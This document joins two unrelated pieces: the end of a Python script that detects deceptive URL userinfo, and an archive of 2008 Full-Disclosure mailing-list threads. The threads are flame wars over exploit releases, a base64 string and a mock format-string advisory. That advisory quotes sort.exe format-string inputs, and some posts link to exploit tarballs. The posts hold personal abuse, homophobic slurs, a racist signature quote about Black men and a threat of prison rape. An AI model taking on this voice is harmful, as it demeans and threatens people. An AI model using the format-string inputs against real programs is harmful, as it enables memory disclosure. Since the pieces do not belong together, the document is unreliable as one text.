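]


def inspect_url(url):
    """Return the host a URL connects to and whether its userinfo imitates a host."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    # Percent-decode so padding such as %20 does not hide the leading name.
    userinfo = unquote(parts.username or "")
    match = HOSTLIKE.match(userinfo)
    claimed = match.group(0).lower() if match else None
    return {
        "connects_to": host,
        "userinfo": userinfo or None,
        "has_password": parts.password is not None,
        "claimed_host": claimed,
        # Deceptive: the part a reader sees first names a different host
        # than the one the client will actually contact.
        "deceptive": claimed is not None and claimed != host,
    }


def report(urls=SAMPLES):
    """Inspect each URL and return (url, findings) pairs."""
    return [(u, inspect_url(u)) for u in urls]


if __name__ == "__main__":
    for url, info in report():
        verdict = "DECEPTIVE" if info["deceptive"] else "ok"
        print(f"{verdict:9} connects_to={info['connects_to']!r} "
              f"userinfo={info['userinfo']!r}  {url}")
```
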

Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone

2008-01-28 Thread reepex
lol best troll ever

On 1/28/08, Donald Republic [EMAIL PROTECTED] wrote:

 Dear Full Disclosure,

 We are writing to you on behalf of Bart Cilfone. He has asked us to
 contact you and see if you will consider removing the content about him at:

 http://seclists.org/fulldisclosure/2008/Jan/0497.html

 Please allow us to introduce ourselves. We are ReputationDefender, Inc., a
 company dedicated to helping our clients preserve their good name on the
 Internet. Our founders and employees are all regular Internet users. Like
 our clients, and perhaps like you, we think the Internet is sometimes
 unnecessarily hurtful to the privacy and reputations of everyday people.
 Even content that is meant to be informative can sometimes have a
 significant and negative impact on someone's job prospects, student
 applications, and personal life. We invite you to learn more about who we
 are, at www.reputationdefender.com.

 When our clients sign up with our service, we undertake deep research
 about them on the Internet to see what the Web is saying about them. We find
 sites where they are discussed, and we ask our clients how they feel about
 those sites. Sometimes our clients express strong reservations about the
 content on particular websites. They may feel hurt, ashamed, or invaded by
 the content about them on those sites.

 As you may know, more and more prospective employers, universities, and
 newfound friends and romantic interests undertake Internet research, and the
 material they find can strongly impact their impressions of the people they
 are getting to know. When people apply for jobs, apply for college or
 graduate school, apply for loans, begin dating, or seek to do any number of
 other things with their lives, hurtful content about them on the Internet
 can have a negative impact on their opportunities. At some point or another,
 most of us say things about ourselves or our friends and acquaintances we
 later regret. We're all human, and we all do it!

 We are writing to you today because our client, Bart Cilfone, has told us
 that he would like the content about him on your website to be removed as it
 is outdated and disturbing to him. Would you be willing to remove or alter
 the content? It would mean so much to Mr. Cilfone, and to us. Considerate
 actions such as these will go a long way to help make the Internet a more
 civil place.

 Thank you very much for your consideration. We are mindful that matters
 like these can be sensitive. We appreciate your time.

 Please let us know if you have removed or changed the content on this site
 by sending an e-mail to: [EMAIL PROTECTED]


 Yours sincerely,

 Donald Republic
 Reputation Defender Service Team


Re: [Full-disclosure] old junk

2008-01-22 Thread reepex
so mr prdelka - how can you act so blackhat when releasing exploits?
Did you write these exploits yourself or did you pawn these off ilja as
usual?


On 1/21/08, Micheal Turner [EMAIL PROTECTED] wrote:

 old junk from 2007. roll on 2008! cb payload busted in
 rshd exploit. enjoy.

 http://rapidshare.com/files/85400481/prdelka-vs-GNU-citadel.tar.gz.html
 http://rapidshare.com/files/85400619/prdelka-vs-MS-rshd.tar.gz.html



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread reepex
...

if base64 was challenging for you then maybe you should switch fields of
work

On Jan 21, 2008 9:04 PM, Maxim [EMAIL PROTECTED] wrote:

 that was fun ... :-)

 stuff like that should be on people's job interviews.

 On Mon, 2008-01-21 at 21:59 -0500, [EMAIL PROTECTED] wrote:
  Remember that although 99.98% of the Internet population ends up using
 it,
  99.97% are totally unaware of the fact because they have point-n-drool
 GUI
  interfaces to hide the gory details from them.



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread reepex
you said it was 'fun' implying that you felt happy after you had
accomplished the task ( decoding the string in this case ). so unless you
naturally have fun decoding simple strings, then this must have been a new
experience for you/challenging one to solve

On Jan 21, 2008 9:28 PM, Maxim [EMAIL PROTECTED] wrote:

 where did I use the word challenging?

 On Mon, 2008-01-21 at 21:25 -0600, reepex wrote:
  ...
 
  if base64 was challenging for you then maybe you should switch fields
  of work
 
  On Jan 21, 2008 9:04 PM, Maxim [EMAIL PROTECTED] wrote:
  that was fun ... :-)
 
  stuff like that should be on people's job interviews.
 
  On Mon, 2008-01-21 at 21:59 -0500, [EMAIL PROTECTED]
  wrote:
   Remember that although 99.98% of the Internet population
  ends up using it,
   99.97% are totally unaware of the fact because they have
  point-n-drool GUI
   interfaces to hide the gory details from them.
 
 
 
 

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread reepex
On Jan 21, 2008 8:39 PM, Harry Hoffman [EMAIL PROTECTED] wrote:

 Is this anything more than a base64 encoded password hash?


base64 encoded password hash - lol - what security for dumbies book did
you get this phrase from? also after identifying it as base64 could you
really not decode it to get the plaintext value?

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread reepex
c2h1dCB1cCBoaXBwaWU=

On Jan 21, 2008 9:50 PM, Pat [EMAIL PROTECTED] wrote:



 On 22/01/2008, reepex [EMAIL PROTECTED] wrote:

  On Jan 21, 2008 8:39 PM, Harry Hoffman [EMAIL PROTECTED]
  wrote:
 
   Is this anything more than a base64 encoded password hash?
  
 
  base64 encoded password hash - lol - what security for dumbies book
  did you get this phrase from? also after identifying it as base64 could you
  really not decode it to get the plaintext value?
 

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread reepex
On Jan 21, 2008 10:50 PM, Nick FitzGerald [EMAIL PROTECTED] wrote:

 Think pre-MIME/Base64 and U should be able to suss it out...


nice aol speak noob ;)

it shar would be a pity if people didnt get this

Re: [Full-disclosure] congenital idiots(dont u know who nick fitzgerald is?(now I KNOW why I never post in my real name)) Re: [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread reepex
a ... you are first of probably many to miss the intention of why i
called out that line and that particular 'U'

one day it will come to you :)

On Jan 21, 2008 11:10 PM, bugtraq user [EMAIL PROTECTED] wrote:

 Anklebiters getting rather deep arent they Nick?


a bugtraq follower(camp follower)


 reepex wrote:
  On Jan 21, 2008 10:50 PM, Nick FitzGerald [EMAIL PROTECTED]
  mailto:[EMAIL PROTECTED] wrote:
 
  Think pre-MIME/Base64 and U should be able to suss it out...
 
 
  nice aol speak noob ;)
 
  it shar would be a pity if people didnt get this
 
  
 
 congent


Re: [Full-disclosure] [FDSA] Sort - Critical Format String Vulnerability

2008-01-18 Thread reepex
LOL you are an idiot

could you please google format string 101, read the printf man page, and
leave security forever

On Jan 18, 2008 1:45 AM, Tonnerre Lombard [EMAIL PROTECTED]
wrote:

 Salut, Fredrick,

 On Thu, 17 Jan 2008 12:05:13 -0600 Fredrick Diggle
 [EMAIL PROTECTED] wrote:
  The following output shows a manifestation of this vulnerability:
 
  C:\sort %x.%x.%x.%x
  7c812f39.0.0.41414141The system cannot find the file specified.

 This is actually confirmed on Windows 2000 and XP.

  This vulnerability can be trivially exploited to execute arbitrary
  code on the computer machine.

 There I don't agree however, it is a simple memory reading
 vulnerability.

  The following command line will use sort.exe to execute the windows
  calculator.
 
  C:\sort CALC.EXE%x%x%x%n | calc

 That's not very surprising since you pipe into the calculator so it is
 spawned by the shell.

  Severity: Quite High

 There I don't agree. In theory, there should not be anything important
 in the memory of the sort process which is not already known to the
 user executing it anyway. It is clearly a bug though, and wants to be
 fixed. So congratulations to a working, though overdramatized,
 discovered format string vulnerability.

Tonnerre
 --
 SyGroup GmbH
 Tonnerre Lombard

 Solutions Systematiques
 Tel:+41 61 333 80 33Güterstrasse 86
 Fax:+41 61 383 14 674053 Basel
 Web:www.sygroup.ch  [EMAIL PROTECTED]


Re: [Full-disclosure] what is this?

2008-01-17 Thread reepex
and what exactly does gadi evron know and what .. original research ... has
he ever done?

and your second paragraph makes no sense, and is not related to the topic -
you sound like paul at utdallas

On 1/16/08, scott [EMAIL PROTECTED] wrote:

 Not to mention that Gadi Evron knows more than all of these wanna-be's
 put together!

 I guess the new world order of cyberpunks is just really intolerant of
 ideas that are outside the realm of neat tools and other people writing
 their exploits for them,so that the sheer act of learning something new
 turns them off. :-(

 Lord Help InfoSec,
Scott



 Tremaine Lea wrote:
  Probably because Gadi is at least close to on topic whether the majority
  of readers appreciate the posts or not.
 
 
  
 

Re: [Full-disclosure] Gadi Bashing, enough already....

2008-01-17 Thread reepex
so gadi can use ethereal and uninstall malware? congrats?

On 1/17/08, Richard Golodner [EMAIL PROTECTED] wrote:

 I have been friends with Gadi through email for many years now and
 he needs to have someone represent for him. He is a good guy, signs his
 own
 email instead of the hushmail or Gmail mask.
  On top of all that he is also a knowledgeable and friendly guy.
 He
 does a great job exploring and reporting the areas of interest to him and
 has helped many people remove bot-net problems from their own nets. Give
 the
 guy a break, he is a good dude.
 P.S. Punks do not know what federal agencies read these dumb ass
 lists but should be aware that email threats can be taken very far in
 courts
 these days. Ask old Kevin!

 Richard Golodner
 [EMAIL PROTECTED]
 PGP 0x50F20D0C



Re: [Full-disclosure] what is this?

2008-01-16 Thread reepex
On Jan 14, 2008 3:46 PM, Gadi Evron [EMAIL PROTECTED] wrote:

 I did not look at the malware, but it is pretty obvious you have been
 compromised.


Because you do not have the skill necessary to do so.


 Linking also to my original article here:
 http://blogs.securiteam.com/index.php/archives/815


blah blah i have nothing useful to say but I am going to spam my blog that
no one reads.

Why do we let gadi spam but bitch about the guy spamming to defend his
business?

Re: [Full-disclosure] what is this?

2008-01-16 Thread reepex
woah paul are you talking about stuff you do not know about again? [1] You
like to butt in on conversations. and how do you know that this virus has been
put in virustotal, maybe it is new? Most people with decent RE skill (
unlike you and gadi ),  would take the virus apart themselves to see what it
is doing

[1] http://archives.neohapsis.com/archives/fulldisclosure/2007-11/0018.html

Here paul calls out comp sci majors and when I took his bet he backed down
saying it was a joke. Seems paul likes to run his mouth about nothing.

On Jan 16, 2008 8:26 PM, Paul Schmehl [EMAIL PROTECTED] wrote:

 --On January 16, 2008 8:19:52 PM -0600 reepex [EMAIL PROTECTED] wrote:

  On Jan 14, 2008 3:46 PM, Gadi Evron [EMAIL PROTECTED] wrote:
 
  I did not look at the malware, but it is pretty obvious you have been
  compromised.
 
  Because you do not have the skill necessary to do so.
 

 Yeah, right.  It takes real l33t ski11z to submit a file to Virustotal and
 find out what it is.  And uber l33t ski11z to figure out that the
 javascript on his website is downloading the infection to site visitors.

 Paul Schmehl ([EMAIL PROTECTED])
 Senior Information Security Analyst
 The University of Texas at Dallas
 http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] Hacking The Interwebs

2008-01-15 Thread reepex
On 1/13/08, pdp (architect) [EMAIL PROTECTED] wrote:

 The most malicious of all malicious things to do when a device is
 compromised via the attack described in the link pointed at the top of this
 email, is to change the primary DNS server. That will effectively turn the
 router and the network it controls into a zombie which the attacker can take
 advantage of whenever they feel like it.


lol fear/fud/attempt for media hype?

Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code

2008-01-10 Thread reepex
this was a very rude off list reply to my question

and notice - you still have not answered why you released this code a year
later

could you please answer this?

On Jan 10, 2008 6:13 PM, eliteb0y [EMAIL PROTECTED] wrote:

  Shut the fuck up.


  --

 *From:* reepex [mailto:[EMAIL PROTECTED]
 *Sent:* Friday, January 11, 2008 1:03 AM
 *To:* eliteb0y; full-disclosure@lists.grok.org.uk
 *Subject:* Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash
 Exploit Code



 http://seclists.org/fulldisclosure/2007/Dec/0394.html

 arent you this idiot? I am pretty sure you are one of the bigger jokes on
 this list.

 also you did not answer my question: why did you release such simple code
 a year later?

 On Jan 10, 2008 4:01 PM, eliteb0y [EMAIL PROTECTED] wrote:

 Thank you for being everyones personal idiot.


  --

 *From:* reepex [mailto:[EMAIL PROTECTED]
 *Sent:* Thursday, January 10, 2008 9:28 PM
 *To:* kcope; full-disclosure@lists.grok.org.uk
 *Subject:* Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash
 Exploit Code



 did it take you the whole year since the bug was published to write this
 code? Why release something so simple for such an old bug? Does this excuse
 your retarded songs you throw at us?

 On Jan 10, 2008 11:16 AM, kcope  [EMAIL PROTECTED] wrote:

 (see attached)

 - -kcope


Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code

2008-01-10 Thread reepex
you still have not given a reason as to why you published this code

On Jan 10, 2008 11:44 PM, eliteb0y [EMAIL PROTECTED] wrote:

 Bla bla bla, no it was bla

 -Original Message-
 From: Joey Mengele [mailto:[EMAIL PROTECTED]
 Sent: Friday, January 11, 2008 5:44 AM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit
 Code

 The Benign Euphoria,

 It discourages them from posting faggot shit to the list in the
 future. Thanks.

 J

 One in every three black males is in some phase of the correctional
 system. Is that a coincidence or do these people have, you know,
 like a racial commitment to crime? - Valdis Kletnieks

 On Thu, 10 Jan 2008 20:20:22 -0500 b9u4ea [EMAIL PROTECTED] wrote:
 Regardless of their contribution, what is the benefit of
 belittling
 anyone on (or off) the list?
 
 On Jan 10, 2008 6:17 PM, reepex [EMAIL PROTECTED] wrote:
  this was a very rude off list reply to my question
 
  and notice - you still have not answered why you released this
 code a year
  later
 
  could you please answer this?
 
  On Jan 10, 2008 6:13 PM, eliteb0y  [EMAIL PROTECTED] wrote:
  
  
  
  
   Shut the fuck up.
  
  
  
   
 
  
   From: reepex [mailto:[EMAIL PROTECTED]
   Sent: Friday, January 11, 2008 1:03 AM
   To: eliteb0y; full-disclosure@lists.grok.org.uk
  
  
   Subject: Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel
 Crash Exploit
  Code
  
  
  
  
  
  
  
  
  
   http://seclists.org/fulldisclosure/2007/Dec/0394.html
  
   arent you this idiot? I am pretty sure you are one of the
 bigger jokes on
  this list.
  
   also you did not answer my question: why did you release such
 simple code
  a year later?
  
  
   On Jan 10, 2008 4:01 PM, eliteb0y [EMAIL PROTECTED] wrote:
  
  
  
   Thank you for being everyones personal idiot.
  
  
  
  
   
 
  
   From: reepex [mailto: [EMAIL PROTECTED]
   Sent: Thursday, January 10, 2008 9:28 PM
   To: kcope; full-disclosure@lists.grok.org.uk
   Subject: Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel
 Crash Exploit
  Code
  
  
  
  
  
   did it take you the whole year since the bug was published to
 write this
  code? Why release something so simple for such an old bug? Does
 this excuse
  your retarded songs you throw at us?
  
  
   On Jan 10, 2008 11:16 AM, kcope  [EMAIL PROTECTED] wrote:
  
   (see attached)
  
   - -kcope
  

Re: [Full-disclosure] PWDumpX v1.4

2008-01-08 Thread reepex
he is a 'point and click' hacker .. do not confuse him

On Jan 8, 2008 3:00 AM, Tonnerre Lombard [EMAIL PROTECTED]
wrote:

 Salut,

 On Tue, 8 Jan 2008 04:21:33 +0200 Markus Jansson 
 [EMAIL PROTECTED] wrote:
  How about a nice GUI? Or at least some kind of GUI?
 
  I don't know what OS are you using, but I stopped using MS-DOS about 15
  years ago. I'm sure there are folks out there who just love command
  line crap, mostly Linux users I suppose, they obviously are still
  missing what even Windows 3.11 had. But most of us who live in this
  day are used to using OS and programs that work via GUI.

 Ever tried to use a GUI over telnet?

 What are you going to do in a remote pentest? Try to install a VNC
 server on the server in order to be able to start the GUI?

Tonnerre
 --
 SyGroup GmbH
 Tonnerre Lombard

 Solutions Systematiques
 Tel:+41 61 333 80 33Güterstrasse 86
 Fax:+41 61 383 14 674053 Basel
 Web:www.sygroup.ch  [EMAIL PROTECTED]


Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]

2008-01-03 Thread reepex
well I will miss all your fan mail from the past. maybe i will forward them
to the list one day for other's entertainment

On Jan 2, 2008 9:55 PM, scott [EMAIL PROTECTED] wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 And your earth-shattering views are *SO* important,you must make sure
 everyone hears you.I think you just like to see your own posts.

 I'm filtering your posts from now on as they are nothing but from a
 wanna-be trying to play kids games in a man's world.

 I shouldn't waste my time responding to a teeny- bopper,anyway.

 Scott
 reepex wrote:
  So you included me in here because my name has something to do with farm
  equipment? Did your message have a point?
 
  You wrote a bunch of nonsense flattering your favorite security stars
 and
  then attempted to flame us with one liners that did not make sense.. It
  seems you are caught in between the serious posters ( since you have no
  skill, you cannot post anything useful), and the trolls ( because you
 are
  not funny or convincing ).
 
  My version of full disclosure is calling out idiots with Cissps and
 Phds who
  post here and think their XSS and earth shattering barrages of 0x41's
 makes
  them security experts.
 
  On Jan 2, 2008 10:46 AM, [EMAIL PROTECTED] wrote:
 
  Critical Vulnerability in [Full-Disclosure]
 
  The problem with full disclosure is that everyone feels the need to
  fully disclose, even when their opinion and the information they
  are purporting to impart is, well, bollocks. You can't tell them to
  shut up as they think they're important and the internet gives them
  balls of steel and verbal diarrhoea, so we stumble from one tired
  flamewar to another with no useful content being published.
 
  It's embarrassing.
 
  I'm an advocate of FD as a concept. I believe that there is no such
  thing as an innocent on the internet and if you really are that
  dumb, then you deserve everything you get. FD (as one of many like-
  minded lists) forces the vendors to patch or die and eventually
  write quality code. FD (the concept, not the list) is the ultimate
  nuclear deterrent, without the mutually assured destruction lunacy.
 
  I have watched the posters to this list for some time. By far the
  vast majority are transparently kiddies, sitting on their painted-
  up laptops thinking of themselves as the techno-brats in the film
  Hackers and hoping to grow up to be like the guy in the film
  Swordfish. They write in l33t5p34k and think that this somehow
  makes them informed. Kiddies are the lowest form of life in the
  hierarchy of information security and in the IT industry generally.
 
  You know who you are and so does everyone else. You are fools, and
  an embarrassment to the craft:
  Secreview (review of products/services you have never bought, are
  you the goatse.cz receiver?)
  Reepex (Isn't a reepex a bit of farm machinery?)
  Gobbles (A nickname for a gay male prostitute)
  Morning Wood (The holy grail of the viagra-abuser)
  Gmaggro (high value target selection, are you completely cocking
  stupid?)
 
  Oh, the outrage.
 
  I can see it now. there will be armies of skiddies demanding that
  the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory
  messages concerning her skills and possible employment
  opportunities for her and her mother everywhere possible. Guess
  what, kids? I don't care.
 
  No, not even a little bit. Do what you like, I could care less and
  no one else cares if you live or die tonight, you sad, acne'd
  little dewdrops.
 
  Calmed down yet?
 
  Good. I want you to consider something.
 
  The FD list consists of the following content (and what it has to
  say):
 
  Advisories by vendors (we fixed this)
  Advisories by individuals (I tested that and found this)
  Advisories by infosec organisations (we found this)
  Funnies (self explanatory)
  Opinions (this sucks, what about that?)
  Skids (I did this, aren't I great, everyone else sucks?)
  Trolls (you suck)
  Trawlers (I have something 0day to buy or sell)
 
  The top three (ie the useful content) is available in any one of a
  hundred places, the bottom three are noise. The only people
  interested in the noise are those who keep track of it for a
  living.
 
  So, consider that by posting anything in the bottom three
  categories, you are drawing the attention of those who take an
  interest in your sad efforts to destabilise the technical crutch of
  society. These people are better than you in every important way,
  and if you so much as tiptoe across one of their lines, you'll wind
  up sharing a cell with a 7ft gorilla called george with a dead
  mouse and a pressing need to dry-cornhole your ringpiece 3 times a
  night and twice on sundays. Do yourselves a favour and STFU.
 
  What's left?
 
  The funnies and the opinions. I've laughed my tits off at posts by
  Messrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've
  been interested by a few others who will remain nameless

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-02 Thread reepex
everyone who is not a kiddie knows rsnake is a joke, just like anyone else
involved in his *.ackers group. If rsnake was to post to places like this
instead of lamer 'hacker'/'security' magazines then he would be ridiculed
off the list like pdp architect was. Instead I believe rsnake knows he's a
kiddie so he sticks to places with non-technical people and does not involve
himself with people who actually know what they are talking about.

I picked on Adam Muntner mostly because his lame intern decided to spout up
on the list only to end up being a kiddie, and also Adam brought it upon
himself by putting any worth into what secreview says and replying to their
review.


On Jan 2, 2008 12:02 AM, Andre Gironda [EMAIL PROTECTED] wrote:

 On Jan 1, 2008 9:51 PM, reepex [EMAIL PROTECTED] wrote:
  ok so they are nothing alike because ptp/hts actually teach you stuff while
  UPT was for jokes... so your post was stupid

 The joke's on you since you don't have the context.

  I am not a part of secreview but I realize following email threads is very
  complicated for you.

 It's not complicated.  I simply just don't care about who you are as
 it relates to the thread.  You appear to be attacking the
 person/people I'm defending, while at the same time defending the
 secreview post.

  So you list 5 tools they use then mention they modify a javascript
  library...  So basically they use automated tools and  are former  web
  developers ... sound pretty hardcore

 Javascript is more than just a language for web developers, especially
 when utilized in the Hailstorm SmartAttack library, which isn't a
 Javascript library.  These are completely different concepts.  It
 should also be noted that both Burp Suite and Hailstorm ARC can be
 used in manual and hybrid modes... with step-modes and form-trainers.
 They can modify their traversals and have tons of extra customization
 on top of what other offerings provide... and can customize the
 underlying data-driven attacks.

 Certainly you've read some of Adam Muntner's comments on, say,
 ha.ckers.org and other places?

 Allow me to pick on someone in the industry for a second: RSnake.

 RSnake has an advertisement up on his website that asks, Which web
 application scanner can hack it? Check the Oct 15 post for study
 results:

 http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/

 Most idiots will only read what RSnake / Larry Suto have written, and
 will completely miss the comments by Adam Muntner.  Adam not only
 eloquently puts down the testing techniques by Larry Suto, but also
 makes mention about proper customization of tools and testing outside
 of the commercial scanners.

 Effectively, Adam Muntner is one of the only people that does
 understand this problem that you specifically say that he does not,
 and that the secreview challenge seems to care about most of all other
 points.

 Where was reepex, where was secreview when RSnake and Larry Suto
 blundered our industry into submission?  Why pick on a hero like Adam
 Muntner instead?  What are you getting out of it?

 Worse - RSnake hasn't been called out on this yet - but he has good
 reason to promote Larry's paper.  In fact, it may even be a monetary
 reason.  In an article for INSECURE Magazine, they interview RSnake
 (page 30):
 http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf

 Question; What web application scanners do you use?

 RSnake: [...] my favorite tools in my arsenal (including the manual
 ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap,
 NTOSpider (commercial), httprint, Cain, sn00per, Absynthe, Sqlninja, a
 half dozen Firefox plugins like Webdeveloper, JSView, NoScript,
 Greasemonkey etc... and the entire suite of unix utils out there, like
 wget, telnet, ncftp, etc.

 Notice the only commercial tool listed is NTOSpider.  Coincidence?

 Apparently, too much admiration of a single web application security
 scanning vendor can be a bad thing.  Larry Suto has only ever worked
 with Eric Caso at NTObjectives.

 Adam Muntner has been a customer of several CWE-Compatible and
 aspiring companies out there.  He has a balanced view of both the
 commercial tools and the open-source world, as well as building his
 own tools from scratch as the need may be.

  You must be a cissp because you take yourself and the internet very
  seriously. I am pretty sure no one cares about your opinion either.

 Wrong again; as always.

 Cheers,
 Andre

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-02 Thread reepex
if you noticed he was reading Tanenbaum's book about minix. If you would look
at the book you would see he relies heavily on source code and actually has
the code in the back of the book so that he can refer to it constantly. In
other books I agree you do not have to know C, but for this book, if you do
not know C, you will end up understanding at a very very high level what
message passing is and that's about it.

On Jan 2, 2008 12:39 PM, [EMAIL PROTECTED] wrote:

 On Tue, 01 Jan 2008 12:33:36 CST, reepex said:

  Is this list up to date?  It makes it seem as if you are learning basic
  linux commands, sed, and basic perl. Also why are you reading operating
  system design and implementation when you do not know C?

 C is not a prerequisite for understanding operating systems design. It's only
 needed if the particular operating system you're working with implements its
 internals in C.

 What is more important is understanding the *concepts* - things like locking,
 and race conditions, and how fine-grained locking you need/want for a
 filesystem. Having one big lock is a lot easier, but causes contention - having
 a lot of little locks can cause deadlocks, especially in error handlers. What
 does the filesystem code do if (for example) it gets 2/3 of the way through the
 rename of a file, and encounters an I/O error while writing out the removal of
 the old name of the file?  What are the trade-offs required for an operating
 system to support jitter-free multimedia applications (the first thing to learn
 is that throughput, latency, and jitter are intertwined, and it's very
 difficult to do all 3 well at the same time)?

 It's also important to understand that there are approaches other than Windows
 and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and
 have a lot to tell us about other choices that can be made.  There's still a
 lot of VMS running out there in scattered corners as well - and that system had
 a lot of concepts that one should understand, at least well enough to know why
 my favorite system didn't do it that way because... (Hint - consider how and
 why SYS$FOO variables worked in VMS, and why they're so hard to get working
 correctly under Linux - they're *not* exactly the same as Unix/Linux
 environment variables, and as such provide both problems and solutions that
 environment variables don't).

 Bonus points for knowing that VMS was mostly written in Bliss/32 or some such,
 and VM and MVS were a mixture of assembler and (later on) PL/S.  No C knowledge
 needed for those critters...

 Even when the system *is* written in C, you don't need to be a C guru to
 understand what's going on. Maurice Bach's The Design of the Unix Operating
 System is probably one of the classic texts - but you don't need to know C any
 better than read C code snippet as pseudocode to follow it.

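The two questions raised in the quoted message above (how many small locks avoid deadlock, and what rename does when removing the old name fails part-way) worked through as an added example; it is not from the thread or from any real filesystem. `struct dir`, `fs_rename`, `lock_first` and the `fail_remove` fault flag are hypothetical names, and rolling back the new name is one possible policy, assumed here.

```c
#include <errno.h>
#include <pthread.h>
#include <stdint.h>
#include <string.h>

#define MAX_ENTRIES 8
#define NAME_LEN    32

/* Toy in-memory directory with its own lock (fine-grained locking). */
struct dir {
    pthread_mutex_t lock;
    int  held;                          /* instrumentation: 1 while locked */
    int  fail_remove;                   /* constructed fault: removal hits EIO */
    char names[MAX_ENTRIES][NAME_LEN];  /* empty string marks a free slot */
};

void dir_init(struct dir *d)
{
    memset(d, 0, sizeof *d);
    pthread_mutex_init(&d->lock, NULL);
}

int dir_find(const struct dir *d, const char *name)
{
    for (int i = 0; i < MAX_ENTRIES; i++)
        if (d->names[i][0] && strcmp(d->names[i], name) == 0)
            return i;
    return -1;
}

int dir_add(struct dir *d, const char *name)
{
    if (!name[0] || strlen(name) >= NAME_LEN)
        return -EINVAL;
    for (int i = 0; i < MAX_ENTRIES; i++)
        if (!d->names[i][0]) {
            strcpy(d->names[i], name);
            return 0;
        }
    return -ENOSPC;
}

int dir_remove(struct dir *d, const char *name)
{
    int i = dir_find(d, name);
    if (i < 0)
        return -ENOENT;
    if (d->fail_remove)
        return -EIO;                    /* simulated write error */
    d->names[i][0] = '\0';
    return 0;
}

/* Deadlock avoidance: whichever way round the caller names the two
 * directories, the one at the lower address is always locked first. */
struct dir *lock_first(struct dir *a, struct dir *b)
{
    return ((uintptr_t)a <= (uintptr_t)b) ? a : b;
}

static void lock_pair(struct dir *a, struct dir *b)
{
    struct dir *first = lock_first(a, b);
    struct dir *second = (first == a) ? b : a;
    pthread_mutex_lock(&first->lock);
    first->held = 1;
    if (second != first) {              /* same-directory rename: one lock */
        pthread_mutex_lock(&second->lock);
        second->held = 1;
    }
}

static void unlock_pair(struct dir *a, struct dir *b)
{
    struct dir *first = lock_first(a, b);
    struct dir *second = (first == a) ? b : a;
    if (second != first) {
        second->held = 0;
        pthread_mutex_unlock(&second->lock);
    }
    first->held = 0;
    pthread_mutex_unlock(&first->lock);
}

/* Rename with a single exit path, so no error branch can leak a lock. */
int fs_rename(struct dir *src, const char *old_name,
              struct dir *dst, const char *new_name)
{
    int rc;
    lock_pair(src, dst);
    if (dir_find(src, old_name) < 0)  { rc = -ENOENT; goto out; }
    if (dir_find(dst, new_name) >= 0) { rc = -EEXIST; goto out; }
    rc = dir_add(dst, new_name);        /* step 1: create the new name */
    if (rc)
        goto out;
    rc = dir_remove(src, old_name);     /* step 2: drop the old name */
    if (rc)                             /* failed part-way: undo step 1 */
        dst->names[dir_find(dst, new_name)][0] = '\0';
out:
    unlock_pair(src, dst);
    return rc;
}
```
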

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread reepex
it's funny how you always talk about other people ( like a few days ago when
you were amazed that people exploited an off by one ), and talk about the
old times... sure signs of someone washed up as evident by your
non-productiveness in the last few years ( and no - spamming mailing lists
does not count )

On Jan 2, 2008 1:32 PM, [EMAIL PROTECTED] wrote:

 On Wed, 02 Jan 2008 14:13:48 EST, Randal T. Rioux said:

  OpenVMS is less than 40% Blissful...

 Obviously, it's migrated over the years.  Back in the late 80's when it
 was at its most prevalent (and before it got 'Open' attached to it - we're
 talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
 Bliss32..

  Security relevance: UNHACKABLE! grin

 WANK! (The old-timers will know what that means, and it's not what you
 newbies think... ;)


Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]

2008-01-02 Thread reepex
So you included me in here because my name has something to do with farm
equipment? Did your message have a point?

You wrote a bunch of nonsense flattering your favorite security stars and
then attempted to flame us with one liners that did not make sense.. It
seems you are caught in between the serious posters ( since you have no
skill, you cannot post anything useful), and the trolls ( because you are
not funny or convincing ).

My version of full disclosure is calling out idiots with Cissps and Phds who
post here and think their XSS and earth shattering barrages of 0x41's makes
them security experts.

On Jan 2, 2008 10:46 AM, [EMAIL PROTECTED] wrote:

 Critical Vulnerability in [Full-Disclosure]

 The problem with full disclosure is that everyone feels the need to
 fully disclose, even when their opinion and the information they
 are purporting to impart is, well, bollocks. You can't tell them to
 shut up as they think they're important and the internet gives them
 balls of steel and verbal diarrhoea, so we stumble from one tired
 flamewar to another with no useful content being published.

 It's embarrassing.

 I'm an advocate of FD as a concept. I believe that there is no such
 thing as an innocent on the internet and if you really are that
 dumb, then you deserve everything you get. FD (as one of many like-
 minded lists) forces the vendors to patch or die and eventually
 write quality code. FD (the concept, not the list) is the ultimate
